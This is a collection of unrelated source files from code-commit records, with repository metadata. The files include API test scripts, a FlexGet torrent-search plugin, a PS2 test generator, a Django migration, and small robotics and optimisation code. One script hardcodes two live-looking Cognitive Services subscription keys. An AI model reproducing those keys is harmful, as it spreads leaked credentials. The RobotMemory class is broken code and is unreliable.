if len(getNewPost) is not 1:
print(cc.FAIL + ("FAIL: Expected to get the one post that was added but found %d posts" % len(getNewPost)) + cc.ENDC)
else:
print(cc.GREEN + ("OK: GET /posts/%d got the new post" % newPostId) + cc.ENDC)
if getNewPost[0]['body'] != newPosts[0]['body'] or newPosts[0]['body'] != body:
print(cc.FAIL + ("FAIL: Post did not have the correct body message: %s" % getNewPost[0]['body']) + cc.ENDC)
else:
print(cc.GREEN + ("OK: post body was correct") + cc.ENDC)
######################################
# confirm that we only added one post
posts2 = getPosts()
msg("GET /posts")
pp.pprint(posts2)
if len(posts2) is not len(posts) + 1:
print(cc.FAIL + ("FAIL: Expected one new post added but found %d + 1 = %d" % (len(posts), len(posts2))) + cc.ENDC)
else:
print(cc.GREEN + ("OK: GET /posts returned one additional post") + cc.ENDC)
######################################
print(cc.YELLOW + ('Testing stubs...') + cc.ENDC)
# Stubs
for e in [ "/status", "/statuses", "/statuses/"+config['netid'], "/email", "/email/"+config['netid'], "/zipcode", "/zipcode/"+config['netid'], "/pictures", "/pictures/" + config['netid'] ]:
msg("GET " + e)
pp.pprint(get(e))
for e in [ "/status", "/email", "/zipcode", "/pictures" ]:
msg("PUT " + e)
pp.pprint(put(e))
## done
print(cc.YELLOW + ('COMPLETE!') + cc.ENDC)
| apache-2.0 | Python | |
ce344f340682f81837ae5b71e7c9e17e276c953d | Create nxn.py | omergulen/brainhack17,omergulen/brainhack17,omergulen/brainhack17 | nxn/nxn.py | nxn/nxn.py | N = int(input())
liste = []
for i in range(0,N):
liste.append(list(map(int, input().split(" "))))
prisum = 0
secsum = 0
for i in range(0,N):
prisum += liste[i][i]
j = 0
for i in range(N-1,-1,-1):
secsum += liste[i][j]
j += 1
print(abs(prisum-secsum))
| mit | Python | |
257bc9e6538d8320603b29465a02000646833805 | Add a script to choose randomly from a list. I needed it to choose a random desktop background. | Byvire/python_scripts,Byvire/python_scripts | choose_random.py | choose_random.py | #!/usr/bin/env python3
import random
import sys
if __name__ == "__main__":
options = list(sys.stdin) # list of lines of text
print(random.choice(options), end='')
| mit | Python | |
271999dae2cd7f736b66c68f5e2454aac995a10d | Call `process()` from Python | juliangrosshauser/embed,juliangrosshauser/embed,juliangrosshauser/embed,juliangrosshauser/embed | embed.py | embed.py | from ctypes import cdll
lib = cdll.LoadLibrary("target/release/libembed.dylib")
lib.process()
| mit | Python | |
8ba799bccb479c757070104649d60819e627b507 | Add a search plugin for PtN | Danfocus/Flexget,dsemi/Flexget,v17al/Flexget,X-dark/Flexget,OmgOhnoes/Flexget,Flexget/Flexget,crawln45/Flexget,ZefQ/Flexget,ZefQ/Flexget,tobinjt/Flexget,qvazzler/Flexget,jacobmetrick/Flexget,sean797/Flexget,jawilson/Flexget,patsissons/Flexget,malkavi/Flexget,drwyrm/Flexget,X-dark/Flexget,cvium/Flexget,Pretagonist/Flexget,offbyone/Flexget,tarzasai/Flexget,v17al/Flexget,Flexget/Flexget,OmgOhnoes/Flexget,dsemi/Flexget,JorisDeRieck/Flexget,ratoaq2/Flexget,oxc/Flexget,tvcsantos/Flexget,LynxyssCZ/Flexget,jacobmetrick/Flexget,ianstalk/Flexget,crawln45/Flexget,oxc/Flexget,thalamus/Flexget,voriux/Flexget,X-dark/Flexget,camon/Flexget,tsnoam/Flexget,xfouloux/Flexget,ibrahimkarahan/Flexget,OmgOhnoes/Flexget,jawilson/Flexget,drwyrm/Flexget,Flexget/Flexget,voriux/Flexget,antivirtel/Flexget,ibrahimkarahan/Flexget,jawilson/Flexget,qvazzler/Flexget,crawln45/Flexget,grrr2/Flexget,antivirtel/Flexget,malkavi/Flexget,drwyrm/Flexget,spencerjanssen/Flexget,cvium/Flexget,vfrc2/Flexget,LynxyssCZ/Flexget,JorisDeRieck/Flexget,qk4l/Flexget,dsemi/Flexget,thalamus/Flexget,spencerjanssen/Flexget,gazpachoking/Flexget,tsnoam/Flexget,v17al/Flexget,thalamus/Flexget,tsnoam/Flexget,Flexget/Flexget,grrr2/Flexget,jacobmetrick/Flexget,poulpito/Flexget,oxc/Flexget,tvcsantos/Flexget,crawln45/Flexget,ianstalk/Flexget,LynxyssCZ/Flexget,malkavi/Flexget,ianstalk/Flexget,tarzasai/Flexget,cvium/Flexget,Danfocus/Flexget,Pretagonist/Flexget,ratoaq2/Flexget,lildadou/Flexget,ZefQ/Flexget,vfrc2/Flexget,xfouloux/Flexget,offbyone/Flexget,poulpito/Flexget,Danfocus/Flexget,gazpachoking/Flexget,sean797/Flexget,poulpito/Flexget,ratoaq2/Flexget,patsissons/Flexget,Danfocus/Flexget,patsissons/Flexget,lildadou/Flexget,xfouloux/Flexget,tobinjt/Flexget,sean797/Flexget,offbyone/Flexget,JorisDeRieck/Flexget,spencerjanssen/Flexget,qk4l/Flexget,tobinjt/Flexget,ibrahimkarahan/Flexget,qk4l/Flexget,JorisDeRieck/Flexget,lildadou/Flexget,tarzasai/Flexget,tobinjt/Flexget,malkavi/Flexget,qvazzler/Flexget,Pretagonist/Flexget,jawilson/Flexget,camon/Flexget,vfrc2/Flexget,grrr2/Flexget,LynxyssCZ/Flexget,antivirtel/Flexget | flexget/plugins/search_ptn.py | flexget/plugins/search_ptn.py | from __future__ import unicode_literals, division, absolute_import
import logging
from flexget import plugin
from flexget.entry import Entry
from flexget.event import event
from flexget.utils import requests
from flexget.utils.imdb import extract_id
from flexget.utils.soup import get_soup
from flexget.utils.search import torrent_availability
session = requests.Session()
log = logging.getLogger('search_ptn')
class SearchPTN(object):
schema = {
'type': 'object',
'properties': {
'hashv': {'type': 'string'},
'pass': {'type': 'string'},
'uid': {'type': 'number'}
},
'required': ['hashv', 'pass', 'uid'],
'additionalProperties': False
}
def search(self, entry, config):
cookies = {
'ptn_hashv': config['hashv'],
'ptn_pass': config['pass'],
'ptn_uid': str(config['uid'])
}
# Default to searching by title (0=title 3=imdb_id)
search_by = 0
if 'imdb_id' in entry:
searches = [entry['imdb_id']]
search_by = 3
elif 'movie_name' in entry:
search = entry['movie_name']
if 'movie_year' in entry:
search += ' %s' % entry['movie_year']
searches = [search]
else:
searches = entry.get('search_strings', [entry['title']])
results = set()
for search in searches:
try:
r = requests.get('http://piratethenet.org/browse.php',
params={'search': search, '_by': search_by}, cookies=cookies)
except requests.RequestException as e:
log.error('Error searching ptn: %s' % e)
continue
soup = get_soup(r.text)
if 'login' in soup.head.title.text.lower():
log.error('PtN cookie info invalid')
raise plugin.PluginError('PTN cookie info invalid')
try:
results_table = soup.find_all('table', attrs={'class': 'main'}, limit=2)[1]
except IndexError:
log.debug('no results found for `%s`' % search)
continue
for row in results_table.find_all('tr')[1:]:
columns = row.find_all('td')
entry = Entry()
links = columns[1].find_all('a', recursive=False, limit=2)
entry['title'] = links[0].text
if len(links) > 1:
entry['imdb_id'] = extract_id(links[1].get('href'))
entry['url'] = columns[2].a.get('href')
entry['torrent_seeds'] = int(columns[8].text)
entry['torrent_leeches'] = int(columns[9].text)
entry['search_sort'] = torrent_availability(entry['torrent_seeds'], entry['torrent_leeches'])
size = columns[6].find('br').previous_sibling
unit = columns[6].find('br').next_sibling
if unit == 'GB':
entry['content_size'] = int(float(size) * 1024)
elif unit == 'MB':
entry['content_size'] = int(float(size))
elif unit == 'KB':
entry['content_size'] = int(float(size) / 1024)
results.add(entry)
return results
@event('plugin.register')
def register_plugin():
plugin.register(SearchPTN, 'ptn', groups=['search'], api_ver=2)
| mit | Python | |
9416747193dfd597bf15d855d4673cb5b16ce76e | Add python methods to handle api end-points | EdwinKato/bucket-list,EdwinKato/bucket-list,EdwinKato/bucket-list,EdwinKato/bucket-list,EdwinKato/bucket-list | api/api.py | api/api.py | from connexion.resolver import RestyResolver
from flask import current_app, request, abort, jsonify, g, url_for
from flask_httpauth import HTTPAuth
__all__ = ["login", "register", "add_bucket_list", "get_bucket_lists",
"get_bucket_list","put_bucket_list","delete_bucket_list",
"create_item_in_bucket_list", "get_items_in_bucket_list",
"update_bucket_list_item", "delete_bucket_list_item"]
def login():
pass
def register():
pass
def add_bucket_list():
pass
def get_bucket_lists():
pass
def get_bucket_list():
pass
def put_bucket_list():
pass
def delete_bucket_list():
pass
def create_item_in_bucket_list():
pass
def get_items_in_bucket_list():
pass
def update_bucket_list_item():
pass
def delete_bucket_list_item():
pass
from api.models import User, BucketList, Item
| mit | Python | |
23d313aff58a34f44fc5addeffd015ac36b1c1be | Add a script that makes generating tests easier. | jpd002/ps2autotests,unknownbrackets/ps2autotests,jpd002/ps2autotests,jpd002/ps2autotests,unknownbrackets/ps2autotests,unknownbrackets/ps2autotests | gentest.py | gentest.py | import os
import re
import subprocess
import sys
import threading
# Note that PS2HOSTNAME is expected to be set in env.
PS2CLIENT = "ps2client"
MAKE = "make"
TEST_ROOT = "tests/"
TIMEOUT = 10
RECONNECT_TIMEOUT = 10
tests_to_generate = [
"cpu/ee/alu",
"cpu/ee/branch",
"cpu/ee/branchdelay",
]
class Command(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
self.output = None
self.timeout = False
self.thread = None
def start(self, capture=True):
def target():
self.process = subprocess.Popen(self.cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
if capture:
self.process.stdin.close()
self.output = ""
while True:
line = self.process.stdout.readline()
self.output += str(line)
if line == "" or line == "-- TEST END" or line == "-- TEST END\r\n" or line == "-- TEST END\n":
break
self.finish()
self.thread = threading.Thread(target=target)
self.thread.start()
def stop(self):
if self.thread.is_alive():
self.timeout = True
self.finish()
self.thread.join()
def finish(self):
try:
self.process.terminate()
except WindowsError:
pass
def run(self, timeout):
self.start()
self.thread.join(timeout)
def prepare_test(test, args):
if not ("-k" in args or "--keep" in args):
olddir = os.getcwd()
os.chdir(TEST_ROOT + os.path.dirname(test))
make_target = "all"
if "-r" in args or "--rebuild" in args:
make_target = "rebuild"
make_result = os.system("%s MAKE=\"%s\" %s" % (MAKE, MAKE, make_target))
os.chdir(olddir)
# Don't run the test if make failed, let them fix it.
if make_result > 0:
sys.exit(make_result)
def gen_test(test, args):
elf_path = TEST_ROOT + test + ".elf"
if not os.path.exists(elf_path):
print("You must compile the test into a ELF first (" + elf_path + ")")
return False
# Seems like the PS2 can hang if it's not reset, let's just always reset for now.
c = Command([PS2CLIENT, "reset"])
c.run(RECONNECT_TIMEOUT)
# Okay, time to run the command.
c = Command([PS2CLIENT, "execee", "host:" + elf_path + " " + " ".join(args)])
c.run(TIMEOUT)
output = c.output
if not re.search(r"^-- TEST END\s*$", output, re.MULTILINE):
print(output)
else:
# Strip out debug output from ps2link, etc.
output = re.sub(r"\A[^\Z]+?-- TEST BEGIN", "-- TEST BEGIN", output, re.MULTILINE)
output = re.sub(r"\n-- TEST END\s*\n[^\Z]+\Z", "\n-- TEST END\n", output, re.MULTILINE)
output = re.sub(r"\r\n", "\n", output)
return output
return False
def gen_test_expected(test, args):
print("Running test " + test + " on the PS2...")
prepare_test(test, args)
result = gen_test(test, args)
expected_path = TEST_ROOT + test + ".expected"
if result != False:
# Normalize line endings on windows to avoid spurious git warnings.
open(expected_path, "wt").write(result)
print("Expected file written: " + expected_path)
return True
return False
def main():
tests = []
args = []
for arg in sys.argv[1:]:
if arg[0] == "-":
args.append(arg)
else:
tests.append(arg.replace("\\", "/"))
if not tests:
tests = tests_to_generate
if "-h" in args or "--help" in args:
print("Usage: %s [options] cpu/ee/alu cpu/ee/branch...\n" % (os.path.basename(sys.argv[0])))
print("Tests should be found under %s and omit the .elf extension." % (TEST_ROOT))
print("Automatically runs make in the test by default.\n")
print("Options:")
print(" -r, --rebuild run make rebuild for each test")
print(" -k, --keep do not run make before tests")
return
for test in tests:
gen_test_expected(test, args)
main()
| isc | Python | |
b0dfbb63a306255bc08eae2e7dd9360ca56a366f | Add default value of access requests enabled to exsisting projects made before model added | aaxelb/osf.io,caseyrollins/osf.io,cslzchen/osf.io,sloria/osf.io,caseyrollins/osf.io,mfraezz/osf.io,mfraezz/osf.io,cslzchen/osf.io,icereval/osf.io,adlius/osf.io,mattclark/osf.io,erinspace/osf.io,felliott/osf.io,cslzchen/osf.io,brianjgeiger/osf.io,saradbowman/osf.io,Johnetordoff/osf.io,baylee-d/osf.io,Johnetordoff/osf.io,cslzchen/osf.io,aaxelb/osf.io,mfraezz/osf.io,CenterForOpenScience/osf.io,saradbowman/osf.io,Johnetordoff/osf.io,CenterForOpenScience/osf.io,pattisdr/osf.io,mattclark/osf.io,adlius/osf.io,sloria/osf.io,adlius/osf.io,caseyrollins/osf.io,HalcyonChimera/osf.io,aaxelb/osf.io,Johnetordoff/osf.io,felliott/osf.io,baylee-d/osf.io,aaxelb/osf.io,sloria/osf.io,adlius/osf.io,pattisdr/osf.io,mattclark/osf.io,brianjgeiger/osf.io,erinspace/osf.io,erinspace/osf.io,mfraezz/osf.io,HalcyonChimera/osf.io,HalcyonChimera/osf.io,felliott/osf.io,felliott/osf.io,brianjgeiger/osf.io,baylee-d/osf.io,icereval/osf.io,brianjgeiger/osf.io,CenterForOpenScience/osf.io,icereval/osf.io,CenterForOpenScience/osf.io,pattisdr/osf.io,HalcyonChimera/osf.io | osf/migrations/0100_set_access_request_enabled.py | osf/migrations/0100_set_access_request_enabled.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-04-30 18:34
from __future__ import unicode_literals
from django.db import migrations, models ,connection
from osf.models import AbstractNode
class Migration(migrations.Migration):
dependencies = [
('osf', '0099_merge_20180427_1109'),
]
def add_default_access_requests_enabled(self, *args, **kwargs):
# Get the date the original noderequest migration was applied
sql = "SELECT applied from django_migrations WHERE app = 'osf' AND name = '0077_add_noderequest_model';"
with connection.cursor() as cursor:
cursor.execute(sql)
date_noderequest_migration = cursor.fetchall()[0][0]
# Get all projects created before that
AbstractNode.objects.filter(created__lte=date_noderequest_migration).update(access_requests_enabled=True)
def remove_default_access_requests_enabled(self, *args, **kwargs):
# Get the date the original noderequest migration was applied
sql = "SELECT applied from django_migrations WHERE app = 'osf' AND name = '0077_add_noderequest_model';"
with connection.cursor() as cursor:
cursor.execute(sql)
date_noderequest_migration = cursor.fetchall()[0][0]
# Get all projects created before that
AbstractNode.objects.filter(created__lte=date_noderequest_migration).update(access_requests_enabled=None)
operations = [
migrations.AlterField(
model_name='noderequestaction',
name='permissions',
field=models.CharField(choices=[(b'read', b'Read'), (b'write', b'Write'), (b'admin', b'Admin')], default=b'read', max_length=5),
),
migrations.RunPython(add_default_access_requests_enabled, remove_default_access_requests_enabled),
]
| apache-2.0 | Python | |
1c511dcc4156d68f84b97067433ca151f549df1b | Add test for protocol. | lndbrg/flowirc | flowirc/tests/test_IRCClientProtocol.py | flowirc/tests/test_IRCClientProtocol.py | from unittest import TestCase
from unittest.mock import Mock, patch, call, MagicMock
from flowirc.client import IRCClientProtocol
__author__ = 'olle.lundberg'
class TestIRCClientProtocol(TestCase):
def setUp(self):
self.proto = IRCClientProtocol()
self.transport = Mock()
def tearDown(self):
self.proto = None
self.transport = None
def test_connection_made(self):
self.proto.after_connection_made = Mock()
self.proto.connection_made(self.transport)
self.assertEqual(self.proto._transport, self.transport)
self.assertEqual(1, self.proto.after_connection_made.call_count)
self.assertEqual((), self.proto.after_connection_made.call_args)
def test_send(self):
self.proto._transport = Mock()
self.proto.send('foo')
self.proto._transport.write.assert_called_once_with(b'foo')
self.proto._transport.reset_mock()
calls = [call(b'foo'), call(b'bar'), call(b'baz')]
self.proto.send('foo', 'bar', 'baz')
self.assertEqual(3, self.proto._transport.write.call_count)
self.proto._transport.write.assert_has_calls(calls)
self.proto._transport.reset_mock()
data = Mock()
data.encode = Mock(side_effect=AttributeError(
"'NoneType' object has no attribute 'encode'"))
self.assertRaises(AttributeError, self.proto.send, data)
@patch('asyncio.Task')
@patch('flowirc.client.MessageBase')
def test_data_received(self, messagebase, task):
self.proto.message_received = Mock()
self.proto.data_received(b'')
self.proto.data_received(b'f')
self.assertEqual(0, task.call_count)
self.proto.data_received(b'foo')
self.assertEqual(1, messagebase.from_str.call_count)
task.called_once_with(self.proto.message_received)
self.assertEqual(1, self.proto.message_received.call_count)
messagebase.reset_mock()
task.reset_mock()
self.proto.message_received.reset_mock()
ping = "PING irc.example.net\r\n"
mock = MagicMock(return_value=ping)
messagebase.from_str = mock
self.proto.data_received(b' \r\nPING :irc.example.net\r\n')
self.assertEqual(1, messagebase.from_str.call_count)
self.proto.message_received.called_once_with(ping)
messagebase.reset_mock()
task.reset_mock()
self.proto.message_received.reset_mock()
mock = MagicMock(return_value=None)
messagebase.from_str = mock
self.proto.data_received(b' \r\nNOT_A_CMD :irc.example.net\r\n')
self.assertEqual(1, messagebase.from_str.call_count)
self.assertEqual(0, self.proto.message_received.call_count)
| mit | Python | |
2af3b158f1bc4f528f3d4aa7efb8cd595caca0a5 | Add dump/html add-on #69 (dump/html) | tadashi-aikawa/gemini | jumeaux/addons/dump/html.py | jumeaux/addons/dump/html.py | # -*- coding:utf-8 -*-
from bs4 import BeautifulSoup
from owlmixin import OwlMixin, TList
from jumeaux.addons.dump import DumpExecutor
from jumeaux.logger import Logger
from jumeaux.models import DumpAddOnPayload
logger: Logger = Logger(__name__)
LOG_PREFIX = "[dump/html]"
class Config(OwlMixin):
default_encoding: str = 'utf8'
force: bool = False
mime_types: TList[str] = [
'text/html'
]
def pretty(html: str) -> str:
return BeautifulSoup(html, "lxml").html.prettify()
class Executor(DumpExecutor):
def __init__(self, config: dict):
self.config: Config = Config.from_dict(config or {})
def exec(self, payload: DumpAddOnPayload) -> DumpAddOnPayload:
mime_type: str = payload.response.mime_type.get()
encoding: str = payload.encoding.get_or(self.config.default_encoding)
if self.config.force:
logger.debug(f"{LOG_PREFIX} Forced to html -- mime_type: {mime_type} -- encoding: {encoding}")
body = pretty(payload.body.decode(encoding, errors='replace')).encode(encoding, errors='replace')
elif mime_type in self.config.mime_types:
logger.debug(f"{LOG_PREFIX} Parse as html -- mime_type: {mime_type} -- encoding: {encoding}")
body = pretty(payload.body.decode(encoding, errors='replace')).encode(encoding, errors='replace')
else:
logger.debug(f"{LOG_PREFIX} Don't Parse as html -- mime_type: {mime_type} -- encoding: {encoding}")
body = payload.body
return DumpAddOnPayload.from_dict({
"response": payload.response,
"body": body,
"encoding": encoding
})
| mit | Python | |
575fd05ace28ed392591228bfdb01f6e739eeff4 | Create RobotMemory.py | liammcinroy/RobotMemory | RobotMemory.py | RobotMemory.py | #-------------------------------------------------------------------------------
# Name: Robot Memory
# Purpose: Stores memory about where robot has been
#
# Author: Liam McInory
#
# Created: 06/03/2014
# Copyright: (c) Liam 2014
# Licence: GNU
#-------------------------------------------------------------------------------
from Myro import *
from math import *
class RobotMemory:
Plot = [[]]
Speed = 0.0
MidpointX = 0
MidpointY = 0
Robot = 0
X = 0
Y = 0
TowardsX = 0
TowardsY = 0
Scale = 0.0
def __init__ (robot, length, height, speed = 0.5, scale = 0.5, lookX = 0, lookY = 1):
Plot = [[0 for x in xrange(length)] for x in xrange(height)]
Speed = speed
Robot = robot
Scale = scale
X = MidpointX
Y = MidpointY
TowardsX = lookX
TowardsY = lookY
def Start(x, y):
MidpointX = x
MidpointY = y
X = MidpointX
Y = MidpointY
def Turn(degrees, left):
time90 = 3 * abs(Speed)
time = Time90 / abs(degrees)
if (left == 1):
Robot.turnLeft(time, abs(Speed))
else:
Robot.turnRight(time, abs(Speed))
TowardsX = TowardsX * cos(degrees) + TowardsY * sin(degrees)
TowardsY = TowardsX * -sin(degrees) + TowardsY * sin(degrees)
def GoForward(duration):
slope = (TowardsY - Y) / (TowardsX - X)
TowardsX += duration
TowardsY += duration
Robot.motors(Speed, Speed)
wait(duration)
divisible = duration / Scale
for x in xrange(X, divisible):
for y in xrange(Y, divisible):
if (Plot[x][y] == 0):
Plot[x][y] = 1
X += divisible
Y += divisible
| mit | Python | |
5579100489031b941617a93baef398212db23d6e | Update openerp | sysadminmatmoz/gantt_improvement,maljac/gantt_improvement,sysadminmatmoz/gantt_improvement,maljac/gantt_improvement,maljac/gantt_improvement,stephane-/gantt_improvement,maljac/gantt_improvement,sysadminmatmoz/gantt_improvement,stephane-/gantt_improvement,stephane-/gantt_improvement,stephane-/gantt_improvement,sysadminmatmoz/gantt_improvement | __openerp__.py | __openerp__.py | {
'name': "Gantt Improvement",
'author' : 'Stéphane Codazzi @ TeMPO-Consulting',
'category': 'Project',
'sequence': 1,
'description': """
Gantt Improvement
=================
""",
'version': '0.3',
'depends': ['web', 'web_gantt'],
'js': [
'static/src/js/gantt.js',
'static/dhtmlxGantt/sources/dhtmlxgantt.js',
],
'css': [
'static/src/css/gantt.css',
'static/dhtmlxGantt/dhtmlxgantt.css',
],
'qweb': ['static/src/xml/gantt.xml'],
'data': [
#'views/web_gantt.xml', #Odoo V8.0
],
}
| {
'name': "Gantt Improvement",
'author' : 'Stéphane Codazzi @ TeMPO-consulting',
'category': 'Project',
'sequence': 1,
'description': """
Gantt Improvement
=================
""",
'version': '0.3',
'depends': ['web', 'web_gantt'],
'js': [
'static/src/js/gantt.js',
'static/dhtmlxGantt/sources/dhtmlxgantt.js',
],
'css': [
'static/src/css/gantt.css',
'static/dhtmlxGantt/dhtmlxgantt.css',
],
'qweb': ['static/src/xml/gantt.xml'],
'data': [
#'views/web_gantt.xml', #Odoo V8.0
],
}
| mit | Python |
718c31a54ce1637ef1ce9d2969a055f621c6dc7f | add MPPT benchmark | Kenneth-T-Moore/CADRE,OpenMDAO/CADRE | src/CADRE/benchmark/benchmark_mppt.py | src/CADRE/benchmark/benchmark_mppt.py | """ Optimization of the CADRE MDP."""
import os
import pickle
import numpy as np
from openmdao.components.indep_var_comp import IndepVarComp
from openmdao.core.component import Component
from openmdao.core.group import Group
from openmdao.core.problem import Problem
from openmdao.core.parallel_group import ParallelGroup
from openmdao.drivers.pyoptsparse_driver import pyOptSparseDriver
try:
from openmdao.core.petsc_impl import PetscImpl as impl
except ImportError:
impl = None
from openmdao.core.mpi_wrap import MPI
from openmdao.test.mpi_util import MPITestCase
if MPI:
from openmdao.core.petsc_impl import PetscImpl as impl
else:
from openmdao.core.basic_impl import BasicImpl as impl
import CADRE
from CADRE.power import Power_SolarPower, Power_CellVoltage
from CADRE.parameters import BsplineParameters
class Perf(Component):
def __init__(self, n):
super(Perf, self).__init__()
self.add_param('P_sol1', np.zeros((n, )), units="W",
desc="Solar panels power over time")
self.add_param('P_sol2', np.zeros((n, )), units="W",
desc="Solar panels power over time")
self.add_output("result", 0.0)
self.J = -np.ones((1, n))
def solve_nonlinear(self, p, u, r):
u['result'] = -np.sum(p['P_sol1']) -np.sum(p['P_sol2'])
def linearize(self, p, u, r):
return {("result", "P_sol1"): self.J,
("result", "P_sol2"): self.J}
class MPPT(Group):
def __init__(self, LOS, temp, area, m, n):
super(MPPT, self).__init__()
params = (
("LOS", LOS, {"units": "unitless"}),
("temperature", temp, {"units": "degK"}),
("exposedArea", area, {"units": "m**2"}),
("CP_Isetpt", np.zeros((12, m)), {"units": "A"})
)
self.add("param", IndepVarComp(params))
self.add("bspline", BsplineParameters(n, m))
self.add("voltage", Power_CellVoltage(n))
self.add("power", Power_SolarPower(n))
#self.add("perf", Perf(n))
self.connect("param.LOS", "voltage.LOS")
self.connect("param.temperature", "voltage.temperature")
self.connect("param.exposedArea", "voltage.exposedArea")
self.connect("param.CP_Isetpt", "bspline.CP_Isetpt")
self.connect("bspline.Isetpt", "voltage.Isetpt")
self.connect("bspline.Isetpt", "power.Isetpt")
self.connect("voltage.V_sol", "power.V_sol")
#self.connect("power.P_sol", "perf.P_sol")
class MPPT_MDP(Group):
def __init__(self):
super(MPPT_MDP, self).__init__()
n = 1500
m = 300
cadre_path = os.path.dirname(os.path.realpath(CADRE.__file__))
data = pickle.load(open(cadre_path + "/test/data1346.pkl", 'rb'))
# CADRE instances go into a Parallel Group
para = self.add('parallel', ParallelGroup(), promotes=['*'])
para.add("pt0", MPPT(data['0:LOS'],
data['0:temperature'],
data['0:exposedArea'],
m, n))
para.add("pt1", MPPT(data['1:LOS'],
data['1:temperature'],
data['1:exposedArea'],
m, n))
self.add("perf", Perf(1500))
self.connect("pt0.power.P_sol", "perf.P_sol1")
self.connect("pt1.power.P_sol", "perf.P_sol2")
class BenchmarkMPPT(MPITestCase):
def benchmark_mppt(self):
self.model = Problem(impl=impl)
self.model.root = MPPT_MDP()
# add SNOPT driver
self.model.driver = pyOptSparseDriver()
self.model.driver.options['optimizer'] = "SNOPT"
self.model.driver.opt_settings = {
'Major optimality tolerance': 1e-3,
'Major feasibility tolerance': 1.0e-5,
'Iterations limit': 500000000,
'New basis file': 10
}
self.model.driver.add_objective("perf.result")
self.model.driver.add_desvar("pt0.param.CP_Isetpt", lower=0., upper=0.4)
self.model.driver.add_desvar("pt1.param.CP_Isetpt", lower=0., upper=0.4)
self.model.setup(check=False)
self.model.run()
| apache-2.0 | Python | |
64184fa97e9bc55dc50ed492b0b03896a7f5328d | Add degree_size | jhanley634/testing-tools,jhanley634/testing-tools,jhanley634/testing-tools,jhanley634/testing-tools,jhanley634/testing-tools,jhanley634/testing-tools,jhanley634/testing-tools | problem/pop_map/grid/degree_size.py | problem/pop_map/grid/degree_size.py | #! /usr/bin/env python
# Copyright 2020 John Hanley.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# The software is provided "AS IS", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall
# the authors or copyright holders be liable for any claim, damages or
# other liability, whether in an action of contract, tort or otherwise,
# arising from, out of or in connection with the software or the use or
# other dealings in the software.
from geopy.distance import distance
import geopy
def main():
# https://en.wikipedia.org/wiki/St._Louis_Lambert_International_Airport
stl = geopy.Point(38.747222, -90.361389)
one_grid = distance(miles=64)
north = one_grid.destination(stl, bearing=0)
east = one_grid.destination(stl, bearing=90)
print(stl.format_decimal())
lat_step = north.latitude - stl.latitude
lng_step = east.longitude - stl.longitude
print(lat_step)
print(lng_step)
if __name__ == '__main__':
main()
| mit | Python | |
b861ce4ca77f66eca61363855003aa508b0d6421 | add api call script | aliceranzhou/geovibes,aliceranzhou/geovibes,aliceranzhou/geovibes | scripts/api_calls.py | scripts/api_calls.py | # -*- coding: utf-8 -*-
import requests
import json
from collections import namedtuple
'''
NEWS
====
value: [
{
name: string
url: string
image: { thumbnail:
{ contentUrl: string
width: int
height: int
}
}
description: string
about: [ { readLink: string
name: string
}
]
mentions: [{ name: string }]
provider: [ {_type: string, name: string} ]
datePublished: date %Y-%m%dT%hh:mm:ss
category: string
}
]
SAMPLE:
{"name": "Snap Is Using Vending Machines for Its New Camera Glasses",
"url": "http:\/\/www.bing.com\/cr?IG=EFB171B8ABC94328B7EE4689A0BB20D9&CID=3F96AB4DDC906F9A3574A286DDA16EAF&rd=1&h=acQNdE7k_qK5fn0QyKfaDgISEoU4tCoAUSGF_bG8KrA&v=1&r=http%3a%2f%2fwww.nbcnews.com%2ftech%2ftech-news%2fsnap-using-vending-machines-its-new-camera-glasses-n682696&p=DevEx,5210.1",
"image": {"thumbnail": {"contentUrl": "https:\/\/www.bing.com\/th?id=ON.01B69C301515AEFBF1DD7823834D5DEE&pid=News", "width": 320, "height": 210}},
"description": "What do a sandwich, soda and Spectacles have in common? You can buy all three from vending machines. Spectacles - the camera glasses from the company formerly known as Snapchat — went up for sale in a bright yellow vending machine on Thursday.",
"about": [{"readLink": "https:\/\/api.cognitive.microsoft.com\/api\/v5\/entities\/90fd2ef2-8123-de59-2b1f-ccd033454a4a", "name": "NBC News"}, {"readLink": "https:\/\/api.cognitive.microsoft.com\/api\/v5\/entities\/3df07628-b8da-2cb7-7d61-95c268a5d178", "name": "Camera"}, {"readLink": "https:\/\/api.cognitive.microsoft.com\/api\/v5\/entities\/97410ae3-4d3a-cf91-43d0-2ad5986953e4", "name": "Vending machine"}],
"mentions": [{"name": "NBC News"}, {"name": "Camera"}, {"name": "Vending machine"}],
"provider": [{"_type": "Organization", "name": "NBC News"}],
"datePublished": "2016-11-12T12:42:00",
"category": "Products"},
SENTIMENT
=========
{
"documents": [
{
"score": 0.0,
"id": "string"
}
]
}
SAMPLE:
{"documents":[{"score":0.9572602,"id":"1"}],"errors":[]}
KEY PHRASES:
[{u'keyPhrases': [u'Spectacles', u'bright yellow vending machine', u'sale', u'soda', u'Los Angeles', u'camera glasses', u'company', u'Thursday', u'vending machines', u'sandwich'], u'id': u'1'}]
'''
#headers = {'Ocp-Apim-Subscription-Key':'782e68122d8742c091f6dee73fc2d270'}
#
#r = requests.get('https://api.cognitive.microsoft.com/bing/v5.0/news/', headers=headers)
#print r.content
#
headers = {'Ocp-Apim-Subscription-Key':'7b20e9c1ffa8470cab2e3b6245148cf6',
'Content-Type': 'application/json',
'Accept': 'application/json'
}
payload = {
"documents": [
{
"language": "en",
"id": "1",
"text": "What do a sandwich, soda and Spectacles have in common? Los Angeles You can buy all three from vending machines. Spectacles - the camera glasses from the company Okalitsa Balatniki formerly known as Snapchat — went up for sale in a bright yellow vending machine on Thursday"
}
]
}
r = requests.post('https://westus.api.cognitive.microsoft.com/text/analytics/v2.0/keyPhrases', json = payload, headers=headers)
print r.json()['documents']
| mit | Python | |
aa1fbbaca3e26904855a33014c5077867df54342 | Add Vetinari example | quasipedia/swaggery,quasipedia/swaggery | examples/vetinari/vetinari.py | examples/vetinari/vetinari.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
'''A Lord Vetinari clock API.'''
from time import strftime, localtime, time
from random import randint
